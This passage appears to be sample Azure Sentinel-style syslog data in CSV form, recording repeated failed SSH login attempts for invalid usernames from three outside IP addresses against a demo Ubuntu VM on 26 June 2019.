+4652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:45:32,UbuntuDevEnv,2019-06-26 14:45:31,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 47343:11: Bye Bye [preauth],12730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,47343,,
+4653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:45:32,UbuntuDevEnv,2019-06-26 14:45:31,auth,UbuntuDevEnv,info,Disconnected from invalid user u1 164.132.192.219 port 47343 [preauth],12730,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,u1,164.132.192.2,47343,,
+4654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:20,UbuntuDevEnv,2019-06-26 14:46:20,auth,UbuntuDevEnv,info,Invalid user rstudio-server from 47.254.147.170 port 41972,12911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rstudio,47.254.147.1,41972,,
+4655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:20,UbuntuDevEnv,2019-06-26 14:46:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,12911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:20,UbuntuDevEnv,2019-06-26 14:46:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:23,UbuntuDevEnv,2019-06-26 14:46:22,auth,UbuntuDevEnv,info,Failed password for invalid user rstudio-server from 47.254.147.170 port 41972 ssh2,12911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rstudio,47.254.147.1,41972,,
+4658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:23,UbuntuDevEnv,2019-06-26 14:46:22,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 41972:11: Bye Bye [preauth],12911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,41972,,
+4659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:23,UbuntuDevEnv,2019-06-26 14:46:22,auth,UbuntuDevEnv,info,Disconnected from invalid user rstudio-server 47.254.147.170 port 41972 [preauth],12911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rstudio,47.254.147.1,41972,,
+4660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:31,UbuntuDevEnv,2019-06-26 14:46:30,auth,UbuntuDevEnv,info,Invalid user cloud from 220.134.138.111 port 60762,12943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloud,220.134.138.1,60762,,
+4661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:31,UbuntuDevEnv,2019-06-26 14:46:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,12943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:31,UbuntuDevEnv,2019-06-26 14:46:30,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,12943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:33,UbuntuDevEnv,2019-06-26 14:46:32,auth,UbuntuDevEnv,info,Failed password for invalid user cloud from 220.134.138.111 port 60762 ssh2,12943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloud,220.134.138.1,60762,,
+4664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:33,UbuntuDevEnv,2019-06-26 14:46:33,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 60762:11: Bye Bye [preauth],12943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,60762,,
+4665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:46:33,UbuntuDevEnv,2019-06-26 14:46:33,auth,UbuntuDevEnv,info,Disconnected from invalid user cloud 220.134.138.111 port 60762 [preauth],12943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cloud,220.134.138.1,60762,,
+4666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:05,UbuntuDevEnv,2019-06-26 14:47:05,auth,UbuntuDevEnv,info,Invalid user nnjoki from 164.132.192.219 port 55903,13069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nnjoki,164.132.192.2,55903,,
+4667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:05,UbuntuDevEnv,2019-06-26 14:47:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:05,UbuntuDevEnv,2019-06-26 14:47:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,13069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:07,UbuntuDevEnv,2019-06-26 14:47:06,auth,UbuntuDevEnv,info,Failed password for invalid user nnjoki from 164.132.192.219 port 55903 ssh2,13069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nnjoki,164.132.192.2,55903,,
+4670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:07,UbuntuDevEnv,2019-06-26 14:47:06,auth,UbuntuDevEnv,info,Disconnected from invalid user nnjoki 164.132.192.219 port 55903 [preauth],13069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nnjoki,164.132.192.2,55903,,
+4671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:07,UbuntuDevEnv,2019-06-26 14:47:06,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 55903:11: Bye Bye [preauth],13069,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,55903,,
+4672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:50,UbuntuDevEnv,2019-06-26 14:47:50,auth,UbuntuDevEnv,info,Invalid user cooper from 47.254.147.170 port 59394,13229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cooper,47.254.147.1,59394,,
+4673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:50,UbuntuDevEnv,2019-06-26 14:47:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,13229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:50,UbuntuDevEnv,2019-06-26 14:47:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:53,UbuntuDevEnv,2019-06-26 14:47:52,auth,UbuntuDevEnv,info,Failed password for invalid user cooper from 47.254.147.170 port 59394 ssh2,13229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cooper,47.254.147.1,59394,,
+4676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:53,UbuntuDevEnv,2019-06-26 14:47:52,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 59394:11: Bye Bye [preauth],13229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,59394,,
+4677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:47:53,UbuntuDevEnv,2019-06-26 14:47:52,auth,UbuntuDevEnv,info,Disconnected from invalid user cooper 47.254.147.170 port 59394 [preauth],13229,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,cooper,47.254.147.1,59394,,
+4678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:20,UbuntuDevEnv,2019-06-26 14:48:20,auth,UbuntuDevEnv,info,Invalid user user from 220.134.138.111 port 49640,13333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,220.134.138.1,49640,,
+4679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:20,UbuntuDevEnv,2019-06-26 14:48:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:20,UbuntuDevEnv,2019-06-26 14:48:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,13333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:22,UbuntuDevEnv,2019-06-26 14:48:22,auth,UbuntuDevEnv,info,Failed password for invalid user user from 220.134.138.111 port 49640 ssh2,13333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,220.134.138.1,49640,,
+4682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:22,UbuntuDevEnv,2019-06-26 14:48:22,auth,UbuntuDevEnv,info,Disconnected from invalid user user 220.134.138.111 port 49640 [preauth],13333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,220.134.138.1,49640,,
+4683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:22,UbuntuDevEnv,2019-06-26 14:48:22,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 49640:11: Bye Bye [preauth],13333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,49640,,
+4684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:37,UbuntuDevEnv,2019-06-26 14:48:37,auth,UbuntuDevEnv,info,Invalid user oleta from 164.132.192.219 port 36243,13392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oleta,164.132.192.2,36243,,
+4685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:37,UbuntuDevEnv,2019-06-26 14:48:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,13392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:37,UbuntuDevEnv,2019-06-26 14:48:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:39,UbuntuDevEnv,2019-06-26 14:48:39,auth,UbuntuDevEnv,info,Failed password for invalid user oleta from 164.132.192.219 port 36243 ssh2,13392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oleta,164.132.192.2,36243,,
+4688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:39,UbuntuDevEnv,2019-06-26 14:48:39,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 36243:11: Bye Bye [preauth],13392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,36243,,
+4689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:48:39,UbuntuDevEnv,2019-06-26 14:48:39,auth,UbuntuDevEnv,info,Disconnected from invalid user oleta 164.132.192.219 port 36243 [preauth],13392,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oleta,164.132.192.2,36243,,
+4690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:49:16,UbuntuDevEnv,2019-06-26 14:49:16,auth,UbuntuDevEnv,info,Invalid user admin from 47.254.147.170 port 48642,13532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,47.254.147.1,48642,,
+4691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:49:16,UbuntuDevEnv,2019-06-26 14:49:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,13532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:49:16,UbuntuDevEnv,2019-06-26 14:49:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:49:18,UbuntuDevEnv,2019-06-26 14:49:18,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 47.254.147.170 port 48642 ssh2,13532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,47.254.147.1,48642,,
+4694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:49:18,UbuntuDevEnv,2019-06-26 14:49:18,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 47.254.147.170 port 48642 [preauth],13532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,47.254.147.1,48642,,
+4695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:49:18,UbuntuDevEnv,2019-06-26 14:49:18,auth,UbuntuDevEnv,info,Received disconnect from 47.254.147.170 port 48642:11: Bye Bye [preauth],13532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.254.147.1,48642,,
+4696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:04,UbuntuDevEnv,2019-06-26 14:50:04,auth,UbuntuDevEnv,info,Invalid user jboss from 164.132.192.219 port 44803,13706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jboss,164.132.192.2,44803,,
+4697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:04,UbuntuDevEnv,2019-06-26 14:50:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:04,UbuntuDevEnv,2019-06-26 14:50:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=164.132.192.219,13706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,164.132.192.2,,0,
+4699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:06,UbuntuDevEnv,2019-06-26 14:50:05,auth,UbuntuDevEnv,info,Failed password for invalid user jboss from 164.132.192.219 port 44803 ssh2,13706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jboss,164.132.192.2,44803,,
+4700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:06,UbuntuDevEnv,2019-06-26 14:50:05,auth,UbuntuDevEnv,info,Received disconnect from 164.132.192.219 port 44803:11: Bye Bye [preauth],13706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,164.132.192.2,44803,,
+4701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:06,UbuntuDevEnv,2019-06-26 14:50:05,auth,UbuntuDevEnv,info,Disconnected from invalid user jboss 164.132.192.219 port 44803 [preauth],13706,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jboss,164.132.192.2,44803,,
+4702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:07,UbuntuDevEnv,2019-06-26 14:50:07,auth,UbuntuDevEnv,info,Invalid user dong from 220.134.138.111 port 38500,13711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dong,220.134.138.1,38500,,
+4703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:07,UbuntuDevEnv,2019-06-26 14:50:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:07,UbuntuDevEnv,2019-06-26 14:50:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,13711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:09,UbuntuDevEnv,2019-06-26 14:50:08,auth,UbuntuDevEnv,info,Failed password for invalid user dong from 220.134.138.111 port 38500 ssh2,13711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dong,220.134.138.1,38500,,
+4706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:09,UbuntuDevEnv,2019-06-26 14:50:09,auth,UbuntuDevEnv,info,Disconnected from invalid user dong 220.134.138.111 port 38500 [preauth],13711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dong,220.134.138.1,38500,,
+4707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:09,UbuntuDevEnv,2019-06-26 14:50:09,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 38500:11: Bye Bye [preauth],13711,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,38500,,
+4708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:40,UbuntuDevEnv,2019-06-26 14:50:39,auth,UbuntuDevEnv,info,Invalid user temp from 47.254.147.170 port 37726,13833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,47.254.147.1,37726,,
+4709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:40,UbuntuDevEnv,2019-06-26 14:50:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:40,UbuntuDevEnv,2019-06-26 14:50:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.254.147.170,13833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.254.147.1,,0,
+4711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:50:42,UbuntuDevEnv,2019-06-26 14:50:41,auth,UbuntuDevEnv,info,Failed password for invalid user temp from 47.254.147.170 port 37726 ssh2,13833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,47.254.147.1,37726,,
